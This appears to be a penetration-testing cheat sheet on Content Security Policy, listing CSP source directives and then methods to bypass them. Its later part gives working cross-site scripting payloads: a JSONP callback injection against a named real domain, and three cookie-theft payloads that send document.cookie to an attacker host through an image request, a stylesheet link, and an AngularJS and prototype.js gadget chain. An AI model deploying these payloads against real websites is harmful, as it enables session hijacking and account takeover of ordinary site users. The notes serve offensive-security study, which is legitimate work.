killchain-compendium/Exploits/Web/CSP.md

Content Security Policy (CSP)

• Either in HTTP header or inside DOM's HTML
• CSP directives
• CSP evaluator
• Bypassing csp

Sources

• * wildcard
• none
• self for sources delivered through the same protocol
  • default-src 'self'; may not load any script
• unsafe-inline
• unsafe-eval
• test.com loads resources from domain but not subdomains
• *.test.com loads resources from subdomains
• data:<content-type>... critical usage
• nonce loads if nonce is correct. sha256, sha384, sha512
  • style hasher

Usage

JSONP

Find JSONP endpoints through which to use custom callback functions

• JSONBee

"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>

Misconfiguration

Insert payload into src attribute

Exfiltration

• Beeceptor
• Local webserver
• connect-src while Ajax/XHR requests are enabled
• Disguising as an image-src or media-src source

<script>(new Image()).src = `https://example.com/${encodeURIComponent(document.cookie)}`</script>

other payloads

<link id="csp" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById("csp").href="http://<attacker-IP>:8000/" + document.cookie;</script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"></script>
<div ng-app ng-csp>
{{$on.curry.call().document.location='https://<attacker-IP>/' + $on.curry.call().document.cookie}}
</div>